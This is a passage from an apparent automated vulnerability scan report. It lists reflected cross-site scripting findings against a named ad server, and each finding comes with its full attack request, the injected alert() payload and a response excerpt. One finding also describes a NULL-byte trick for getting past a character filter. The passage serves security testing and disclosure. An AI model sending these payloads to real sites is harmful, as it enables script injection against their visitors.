       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=688903;BnId=1;itime=210263688;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&29ee4"-alert(1)-"276366267fc=1http://www.homerama-adult-productsonline.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.135. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0058259"-alert(1)-"6d85aaaefd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58259"-alert(1)-"6d85aaaefd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916534;aduho=-360;rdclick=&%0058259"-alert(1)-"6d85aaaefd5=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3058

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
er.adtechus.com/adlink/5214/965696/0/5/AdId=865473;BnId=1;itime=210265188;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%0058259"-alert(1)-"6d85aaaefd5=1http://verona.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.136. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/987201/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1865'-alert(1)-'dd56bbacf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_237x90_1;size=237x90;key=;grp=124;misc=1290352490469;aduho=-360;rdclick=&f1865'-alert(1)-'dd56bbacf1d=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1315

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
+key3+key4;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352643532;nodecode=yes;link=&f1865'-alert(1)-'dd56bbacf1d=1">
...[SNIP]...

2.137. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/987201/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4338f"-alert(1)-"0cde283216b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_237x90_1;size=237x90;key=;grp=124;misc=1290352490469;aduho=-360;rdclick=&4338f"-alert(1)-"0cde283216b=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1315

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352640508;nodecode=yes;link=&4338f"-alert(1)-"0cde283216b=1http://adserver.adtechus.com/adlink/3.0/5294.1/1302170/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352640508
...[SNIP]...

2.138. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/989782/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f6c0'-alert(1)-'cfcbf3c4f49 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/989782/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_2;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207897848;aduho=-360;rdclick=7f6c0'-alert(1)-'cfcbf3c4f49 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 389

document.write('<a href="7f6c0'-alert(1)-'cfcbf3c4f49http://adserver.adtechus.com/?adlink/5214/1245416/0/2687/AdId=-3;BnId=0;itime=210254068;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target
...[SNIP]...

2.139. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/989782/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4060e'-alert(1)-'f5107985fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/989782/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_2;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207897848;aduho=-360;rdclick=&4060e'-alert(1)-'f5107985fe1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 392

document.write('<a href="&4060e'-alert(1)-'f5107985fe1=1http://adserver.adtechus.com/?adlink/5214/1245416/0/2687/AdId=-3;BnId=0;itime=210255021;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" targ
...[SNIP]...

2.140. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38cd8"-alert(1)-"aab3a344439 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=38cd8"-alert(1)-"aab3a344439 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19674

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=48;itime=348784578;nodecode=yes;link=38cd8"-alert(1)-"aab3a344439") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/ad
...[SNIP]...

2.141. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a582'-alert(1)-'425d5f21da8 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=4a582'-alert(1)-'425d5f21da8 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19674

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283049'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=48;itime=348815876;nodecode=yes;link=4a582'-alert(1)-'425d5f21da8')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283049+"'))";
AT_TARGET1283049="_self";
}
window.AT_ClickFn1283049= function (click)
{    click
...[SNIP]...

2.142. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d411c"-alert(1)-"7714f6d0503 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=&d411c"-alert(1)-"7714f6d0503=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19692

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=28;itime=348848711;nodecode=yes;link=&d411c"-alert(1)-"7714f6d0503=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/
...[SNIP]...

2.143. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8426a'-alert(1)-'214fd1f0763 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=&8426a'-alert(1)-'214fd1f0763=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19698

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283049'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=51;itime=348882815;nodecode=yes;link=&8426a'-alert(1)-'214fd1f0763=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283049+"'))";
AT_TARGET1283049="_self";
}
window.AT_ClickFn1283049= function (click)
{    cli
...[SNIP]...

2.144. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5910c"-alert(1)-"5ca7690b82d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=5910c"-alert(1)-"5ca7690b82d HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19670

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=53;itime=348748645;nodecode=yes;link=5910c"-alert(1)-"5ca7690b82d") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/ad
...[SNIP]...

2.145. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a914'-alert(1)-'ac3f8ce7712 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=9a914'-alert(1)-'ac3f8ce7712 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19633

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283052'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348778823;nodecode=yes;link=9a914'-alert(1)-'ac3f8ce7712')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283052+"'))";
AT_TARGET1283052="_self";
}
window.AT_ClickFn1283052= function (click)
{    click
...[SNIP]...

2.146. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cb1b"-alert(1)-"51f3bb95bc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=&7cb1b"-alert(1)-"51f3bb95bc0=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19663

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348811803;nodecode=yes;link=&7cb1b"-alert(1)-"51f3bb95bc0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/
...[SNIP]...

2.147. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac22'-alert(1)-'c021417b4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

